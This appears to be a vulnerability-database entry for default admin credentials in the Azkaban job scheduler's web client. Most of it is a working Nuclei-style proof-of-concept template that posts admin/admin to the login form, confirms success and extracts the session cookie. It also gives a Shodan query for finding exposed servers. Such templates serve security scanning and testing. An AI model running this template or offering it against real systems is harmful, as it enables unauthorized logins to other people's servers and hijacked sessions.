漏洞描述
Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
azkaban-default-login: Azkaban Web Client Default Credential
PoC代码[已公开]
id: azkaban-default-login
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
classification:
cwe-id: CWE-798
cpe: cpe:2.3:a:azkaban_project:azkaban:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"Azkaban Web Client"
product: azkaban
vendor: azkaban_project
tags: default-login,azkaban,vuln
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id
# digest: 4a0a00473045022100ff9729c80dfbd89838f95543a2e8ec4ae82980ad52f54126bf3d0b537007d5cf022053f35537e0112a08e555a5769e781e666fc3a47038e1b25082ba854d9ffaf027:922c64590222798bb761d5b6d8e72950